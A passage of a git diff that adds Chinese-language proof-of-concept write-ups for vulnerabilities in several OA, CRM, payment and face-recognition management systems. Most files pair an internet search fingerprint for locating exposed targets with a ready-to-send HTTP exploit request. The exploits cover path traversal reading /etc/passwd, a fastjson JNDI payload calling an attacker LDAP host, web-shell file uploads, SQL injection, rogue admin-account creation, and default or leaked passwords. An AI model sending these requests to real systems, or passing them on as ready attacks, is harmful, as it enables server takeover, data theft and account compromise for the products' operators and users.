+![1718193755161-d81335ad-f1dc-4afd-a512-cc764cbb611a.png](./img/pSqHXnKzl_2lNnxt/1718193755161-d81335ad-f1dc-4afd-a512-cc764cbb611a-504810.png) + +```java +POST /epay/epay.php HTTP/1.1 +Host: 101.33.219.180:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 157 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Priority: u=1 + +out_trade_no=1 +``` + +![1718193897061-a7e073aa-236a-42d0-a753-5aae192ddcc1.png](./img/pSqHXnKzl_2lNnxt/1718193897061-a7e073aa-236a-42d0-a753-5aae192ddcc1-738243.png) + + + +> 更新: 2024-06-17 09:30:05 +> 原文: \ No newline at end of file 
diff --git a/网课交单平台存在默认口令漏洞.md b/网课交单平台存在默认口令漏洞.md new file mode 100644 index 0000000..2d977cc --- /dev/null +++ b/网课交单平台存在默认口令漏洞.md @@ -0,0 +1,26 @@ +# 网课交单平台存在默认口令漏洞 + +# 一、漏洞简介 +网课交单平台是一款和发卡网对接的网课代学平台,拥有聚合支付,论文编辑等功能,其后台的可用性及可靠性得到了使用者的认可。网课交单平台存在默认口令漏洞 + +# 二、影响版本 ++ 网课交单平台 + +# 三、资产测绘 +```http +"/apisub.php" +``` + +![1718193605379-22758e9d-9d5a-41a0-ba54-3cb86c6a26c9.png](./img/WZsF9pK89MiNKRej/1718193605379-22758e9d-9d5a-41a0-ba54-3cb86c6a26c9-308997.png) + +# 四、漏洞复现 +```java +123456/123456 +``` + +![1718194900487-1f28f246-14af-4738-9e83-e4077a6b12e7.png](./img/WZsF9pK89MiNKRej/1718194900487-1f28f246-14af-4738-9e83-e4077a6b12e7-296525.png) + + + +> 更新: 2024-06-17 09:30:05 +> 原文: \ No newline at end of file diff --git a/美团代付微信小程序系统read.php任意文件读取漏洞.md b/美团代付微信小程序系统read.php任意文件读取漏洞.md new file mode 100644 index 0000000..1ad2e1a --- /dev/null +++ b/美团代付微信小程序系统read.php任意文件读取漏洞.md @@ -0,0 +1,26 @@ +# 美团代付微信小程序系统read.php任意文件读取漏洞 + +美团代付微信小程序系统 read.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="/h5/static/js/chunk-vendors.js" +``` + +## poc + +```javascript +POST /static/ueditor22/_test/tools/br/read.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +name=../../../../../../../../../etc/passwd +``` + +![image-20241114142630011](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141426075.png) \ No newline at end of file diff --git a/美团代付微信小程序系统read存在任意文件读取漏洞.md b/美团代付微信小程序系统read存在任意文件读取漏洞.md new file mode 100644 index 0000000..b142964 --- /dev/null +++ b/美团代付微信小程序系统read存在任意文件读取漏洞.md 
@@ -0,0 +1,35 @@ +# 美团代付微信小程序系统read存在任意文件读取漏洞 + +# 一、漏洞简介 +美团代付微信小程序系统是美团点评旗下的一款基于微信小程序技术开发的应用程序功能之一,它允许用户方便快捷地请求他人为自己支付订单费用。随着移动支付的普及和微信小程序的广泛应用,美团作为中国领先的本地生活服务平台,推出了代付功能,以满足用户多样化的支付重求。通过微信小程序,用户可以轻松实现代付操作,无需跳转到其他应用或网页,提高了支付的便捷性和效率。前台支持购物车,个人中心,多选项等功能 ,后台支持推广,代理管理,菜品管理,积分明细,订单管理,模板,支付通道管理等功能。美团代付微信小程序系统read存在任意文件读取漏洞 + +# 二、影响版本 ++ 美团代付微信小程序系统 + +# 三、资产测绘 +```plain +body="/h5/static/js/chunk-vendors.js" +``` + +![1731078960863-27f91f64-e014-42be-b150-31c628bcc3fc.png](./img/cXUMgsA9n5GhpcIa/1731078960863-27f91f64-e014-42be-b150-31c628bcc3fc-651366.png) + +# 四、漏洞复现 +```plain +POST /static/ueditor22/_test/tools/br/read.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +name=../../../../../../../../../etc/passwd +``` + +![1731078883672-59e6b35a-2fe2-4f03-a02e-7dd31ca97c13.png](./img/cXUMgsA9n5GhpcIa/1731078883672-59e6b35a-2fe2-4f03-a02e-7dd31ca97c13-666911.png) + + + +> 更新: 2024-11-27 10:00:37 +> 原文: \ No newline at end of file diff --git a/美特CRM系统接口sync_emp_weixin存在反序列化漏洞.md b/美特CRM系统接口sync_emp_weixin存在反序列化漏洞.md new file mode 100644 index 0000000..f035abd --- /dev/null +++ b/美特CRM系统接口sync_emp_weixin存在反序列化漏洞.md 
@@ -0,0 +1,29 @@ +# 美特CRM系统接口sync_emp_weixin存在反序列化漏洞 + +美特CRM sync_emp_weixin存在反序列化漏洞,可被恶意攻击者利用执行任意命令,进而控制服务器系统。 + +## fofa + +``` +body="/common/scripts/basic.js" +``` + +## poc + +```javascript +GET /weixin/admin/sync_emp_weixin.jsp?emp_json=[{%22@type%22:%22[com.sun.rowset.JdbcRowSetImpl%22[{,%22dataSourceName%22:%22ldap://vps%22,%22autoCommit%22:true}] HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Connection:close +``` + +![172b7391acfeadb4aaa11d4f2ca85f61](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062301856.jpg) + +![f1bd297bb76c5e5fa0b587da24d15bd4](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062301906.jpg) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/5t_w0ddXQslco6r0f9Rxgg diff --git a/联达OA-uploadLogo.aspx存在任意文件上传.md b/联达OA-uploadLogo.aspx存在任意文件上传.md new file mode 100644 index 0000000..28a6ecd --- /dev/null +++ b/联达OA-uploadLogo.aspx存在任意文件上传.md 
@@ -0,0 +1,28 @@ +## 联达OA uploadLogo.aspx存在任意文件上传 + +## fofa +``` +app="联达OA" +``` + +## poc +``` +POST /Hosp_Portal/uploadLogo.aspx HTTP/1.1 +Host: +Content-Length: 191 +Content-Type: multipart/form-data; boundary=------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA +Content-Disposition: form-data; name="DesignId" + +1 +--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA +Content-Disposition: form-data; name="Filedata";filename="123.asp" + +123 +--------------------------OFkXeLxrBXIgRvlvsZIFniBVqbRidnzdYBsZRzuA-- +``` + +文件路径 +`http://xxx/Hosp_Portal/Logo/123.asp` diff --git a/联达OA接口uploadImg.aspx任意文件上传漏洞.md b/联达OA接口uploadImg.aspx任意文件上传漏洞.md new file mode 100644 index 0000000..c243cfe --- /dev/null +++ b/联达OA接口uploadImg.aspx任意文件上传漏洞.md 
@@ -0,0 +1,39 @@ +# 联达OA接口uploadImg.aspx任意文件上传漏洞 + +联达OA uploadImg.aspx 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## Fofa + +```javascript +app="联达OA" +``` + +## poc + +```javascript +POST /Dept_Portal/uploadImg.aspx HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 +Content-Type: multipart/form-data; boundary=boundary=00content0boundary00 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="DesignId" + +1 +--00content0boundary00 +Content-Disposition: form-data; name="Filedata"; filename="../../../../b.asp" +Content-Type: image/png + +<% Response.Write("Hello, World") %> +--00content0boundary00-- +``` + +![image-20241021210452916](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251422669.png) + +``` +/b.asp +``` + +![image-20241021210504062](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251422557.png) diff --git a/聚合支付平台接口sdcustomno存在SQL注入漏洞.md b/聚合支付平台接口sdcustomno存在SQL注入漏洞.md new file mode 100644 index 0000000..1f25ba5 --- /dev/null +++ b/聚合支付平台接口sdcustomno存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# 聚合支付平台接口sdcustomno存在SQL注入漏洞 + +聚合支付平台接口sdcustomno存在SQL注入漏洞 + +## fofa + +```javascript +"/Public/theme/view4/css/style.css" +``` + +## poc + +```javascript +GET /pay_UPALIWAP_callbackurl?sdcustomno=*%27)%20AND%20(SELECT%202655%20FROM%20(SELECT(SLEEP(5)))DNPm)%20AND%20(%27RWpf%27=%27RWpf HTTP/1.1 +Host: 127.0.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Connection: keep-alive +``` + +![image-20241107115047722](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071150773.png) \ No newline at end of file diff --git a/脸爱云-一脸通智慧管理平台任意用户添加漏洞.md b/脸爱云-一脸通智慧管理平台任意用户添加漏洞.md new file mode 100644 index 0000000..0a9b304 --- /dev/null +++ b/脸爱云-一脸通智慧管理平台任意用户添加漏洞.md 
@@ -0,0 +1,30 @@ +## 脸爱云 一脸通智慧管理平台任意用户添加漏洞 + +脸爱云一脸通智慧管理平台是一套功能强大,运行稳定、操作简单方便、用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。该管理平台/SystemMng.ashx接口处存在权限绕过漏洞,可通过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证攻击者可以通过此漏洞创建超级管理员账户,造成信息泄露和后台接管。 + + +## fofa +``` +"欢迎使用脸爱云 一脸通智慧管理平台" +``` + +## poc +``` +POST /SystemMng.ashx HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/top.html +Connection: close +Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 175 + +operatorName=test1&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators +``` +![image](https://github.com/wy876/POC/assets/139549762/8ae7871e-8eed-4986-a9f8-ad4168b15e2d) + +![image](https://github.com/wy876/POC/assets/139549762/ab201a23-b27a-40d5-9f80-46e1218f238c) diff --git a/脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞.md new file mode 100644 index 0000000..3d641c9 --- /dev/null +++ b/脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞.md 
@@ -0,0 +1,36 @@ +# 脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞 + +# 一、漏洞简介 +脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台MoneyMng存在信息泄露漏洞。 + +# 二、影响版本 ++ 脸爱云一脸通智慧管理平台 + +# 三、资产测绘 ++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"` ++ 特征 + +![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/pmeeBVqtGnp0G6v2/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-869505.png) + +# 四、漏洞复现 +```java +POST /MoneyMng.ashx HTTP/1.1 +Host: +Content-Length: 19 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +funcName=getDataAll +``` + +![1714290083008-d3dbe18b-ab5a-4387-8d2d-aacb9473959b.png](./img/pmeeBVqtGnp0G6v2/1714290083008-d3dbe18b-ab5a-4387-8d2d-aacb9473959b-239033.png) + + + +> 更新: 2024-04-28 15:45:25 +> 原文: \ No newline at end of file diff --git a/脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞.md new file mode 100644 index 0000000..8bcd414 --- /dev/null +++ b/脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞.md 
@@ -0,0 +1,36 @@ +# 脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞 + +# 一、漏洞简介 +脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SelOperators存在信息泄露漏洞。 + +# 二、影响版本 ++ 脸爱云一脸通智慧管理平台 + +# 三、资产测绘 ++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"` ++ 特征 + +![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/d-p_aLeuFN8QvEiC/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-514081.png) + +# 四、漏洞复现 +```java +POST /SystemMng.ashx HTTP/1.1 +Host: +Content-Length: 36 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +username=admin&funcName=SelOperators +``` + +![1714290470519-b752a318-bdc6-4820-8745-c12bef1d956b.png](./img/d-p_aLeuFN8QvEiC/1714290470519-b752a318-bdc6-4820-8745-c12bef1d956b-072385.png) + + + +> 更新: 2024-04-28 15:48:12 +> 原文: \ No newline at end of file diff --git a/脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞.md b/脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞.md new file mode 100644 index 0000000..f8d2fc6 --- /dev/null +++ b/脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞.md 
@@ -0,0 +1,41 @@ +# 脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞 + +# 一、漏洞简介 +脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SystemMng存在任意用户添加漏洞。攻击者可通过该漏洞获取应用权限。 + +# 二、影响版本 ++ 脸爱云一脸通智慧管理平台 + +# 三、资产测绘 ++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"` ++ 特征 + +![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/wRJWfGtKU0DFAQyR/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-193599.png) + +# 四、漏洞复现 +```plain +POST /SystemMng.ashx HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 175 + +operatorName=stctest&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators +``` + +![1700649221299-828e61a4-94f2-4098-9d57-743b83272090.png](./img/wRJWfGtKU0DFAQyR/1700649221299-828e61a4-94f2-4098-9d57-743b83272090-571583.png) + +使用添加的账号`stctest/123456`登录系统 + +![1700649249316-20c950fe-5d84-4d4d-8e9d-ec42c5066ac3.png](./img/wRJWfGtKU0DFAQyR/1700649249316-20c950fe-5d84-4d4d-8e9d-ec42c5066ac3-560999.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞.md new file mode 100644 index 0000000..2bc647b --- /dev/null +++ b/脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞.md 
@@ -0,0 +1,40 @@ +# 脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞 + +# 一、漏洞简介 +脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台SystemMng存在信息泄露漏洞。 + +# 二、影响版本 ++ 脸爱云一脸通智慧管理平台 + +# 三、资产测绘 ++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"` ++ 特征 + +![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/KtUZ6_k7ZH5x80Dq/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-429358.png) + +# 四、漏洞复现 +```java +POST /SystemMng.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Content-Length: 91 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +page=1&arr_search=%7B%22username%22%3A%22%22%2C%22memo%22%3A%22%22%7D&funcName=getOperators +``` + +![1714289895012-ee2f78c8-a94c-4a20-ad0c-e26a9fb89139.png](./img/KtUZ6_k7ZH5x80Dq/1714289895012-ee2f78c8-a94c-4a20-ad0c-e26a9fb89139-479801.png) + +使用泄露的账号密码登录系统`admin/LSFace2023` + + + + + +> 更新: 2024-04-28 15:39:23 +> 原文: \ No newline at end of file diff --git a/脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞.md b/脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞.md new file mode 100644 index 0000000..8b8f8c2 --- /dev/null +++ b/脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞.md 
@@ -0,0 +1,57 @@ +# 脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞 + +# 一、漏洞简介 +脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞。攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 脸爱云一脸通智慧管理平台 + +# 三、资产测绘 ++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"` ++ 特征 + +![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/TMb0E4UMwzE5Sufh/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-957942.png) + +# 四、漏洞复现 +```java +POST /UpLoadPic.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Content-Length: 431 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u +X-Requested-With: XMLHttpRequest + +------WebKitFormBoundarywt7cEu1eBdibB13u +Content-Disposition: form-data; name="action" + +post +------WebKitFormBoundarywt7cEu1eBdibB13u +Content-Disposition: form-data; name="myPhoto"; filename="1.aspx" +Content-Type: image/png + +<% response.write("FC5E038D38A57032085441E7FE7010B0") %> +------WebKitFormBoundarywt7cEu1eBdibB13u +Content-Disposition: form-data; name="oldName" + + +------WebKitFormBoundarywt7cEu1eBdibB13u-- +``` + +![1714288574828-15ec00c1-67e4-41b6-99c0-178e1a014b21.png](./img/TMb0E4UMwzE5Sufh/1714288574828-15ec00c1-67e4-41b6-99c0-178e1a014b21-479202.png) + +文件上传位置 + +```java +/images/48884063e99e45ba9fc0fa7e138261021.aspx +``` + +![1714288605618-a32595ec-d02e-42eb-86d1-11b3e54dd707.png](./img/TMb0E4UMwzE5Sufh/1714288605618-a32595ec-d02e-42eb-86d1-11b3e54dd707-583654.png) + + + +> 更新: 2024-04-28 15:34:50 +> 原文: \ No newline at end of file diff --git a/脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞.md new file mode 100644 index 0000000..95ee572 --- /dev/null +++ b/脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞.md 
@@ -0,0 +1,36 @@ +# 脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞 + +# 一、漏洞简介 +脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台UserMng存在信息泄露漏洞。 + +# 二、影响版本 ++ 脸爱云一脸通智慧管理平台 + +# 三、资产测绘 ++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"` ++ 特征 + +![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/b8NwS0h2DS3f8eR9/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-630933.png) + +# 四、漏洞复现 +```java +POST /UserMng.ashx HTTP/1.1 +Host: +Content-Length: 483 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +page=1&arr_search=%7B%22bmmc%22%3A%22%22%2C%22rfzt%22%3A%22%22%2C%22cardid%22%3A%22%22%2C%22klb%22%3A%22%22%2C%22ryxm%22%3A%22%22%2C%22rybh%22%3A%22%22%2C%22sex%22%3A%22%22%2C%22ryzt%22%3A%22%22%2C%22rfoperator%22%3A%22%22%2C%22EngName%22%3A%22%22%2C%22WeChat%22%3A%22%22%2C%22Tel%22%3A%22%22%2C%22groupname%22%3A%22%22%2C%22jituanname%22%3A%22%22%2C%22companyname%22%3A%22%22%2C%22startime%22%3A%22%22%2C%22endtime%22%3A%22%22%2C%22order%22%3A%22khrq+desc%22%7D&funcName=getUserInfo +``` + +![1714290261285-83391a2e-b164-4fff-945a-1c541911cbe1.png](./img/b8NwS0h2DS3f8eR9/1714290261285-83391a2e-b164-4fff-945a-1c541911cbe1-043774.png) + + + +> 更新: 2024-04-28 15:44:25 +> 原文: \ No newline at end of file diff --git a/脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞.md b/脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞.md new file mode 100644 index 0000000..36276bb --- /dev/null +++ b/脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞.md 
@@ -0,0 +1,34 @@ +# 脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞 + +# 一、漏洞简介 +脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞。 + +# 二、影响版本 ++ 脸爱云一脸通智慧管理平台 + +# 三、资产测绘 ++ hunter`web.icon=="4f0be080512ee0b45fc90ff894b6ba60"` ++ 特征 + +![1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png](./img/oYOAbyeNxy0-K3kx/1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28-421332.png) + +# 四、漏洞复现 +```java +GET /downloads.aspx?Ename=UserInfo&total=1000&jsonParam={%22rybh%22:%22%22,%22ryxm%22:%22%22,%22EngName%22:%22%22,%22groupname%22:%22%22,%22companyname%22:%22%22,%22bmmc%22:%22%22,%22ryzt%22:%22%22,%22rzstartime%22:%22%22,%22rzendtime%22:%22%22,%22lzstartime%22:%22%22,%22lzendtime%22:%22%22,%22zhiwu%22:%22%22,%22cardid%22:%22%22,%22rfzt%22:%22%22,%22klb%22:%22%22,%22sxstartime%22:%22%22,%22sxendtime%22:%22%22,%22khstartime%22:%22%22,%22khendtime%22:%22%22,%22rfoperator%22:%22%22,%22rfstartime%22:%22%22,%22rfendtime%22:%22%22,%22feat%22:%22%22} HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![1714289513778-bfcc1b6d-0d32-422d-90f6-64868d76dc93.png](./img/oYOAbyeNxy0-K3kx/1714289513778-bfcc1b6d-0d32-422d-90f6-64868d76dc93-068062.png) + +![1714289539725-6727a5dd-f8c7-49a6-9297-493ce0cdb52d.png](./img/oYOAbyeNxy0-K3kx/1714289539725-6727a5dd-f8c7-49a6-9297-493ce0cdb52d-931943.png) + + + +> 更新: 2024-04-28 15:34:16 +> 原文: \ No newline at end of file diff --git a/腾狐TOS行为管理系统存在弱口令漏洞.md b/腾狐TOS行为管理系统存在弱口令漏洞.md new file mode 100644 index 0000000..6a3d544 --- /dev/null +++ b/腾狐TOS行为管理系统存在弱口令漏洞.md 
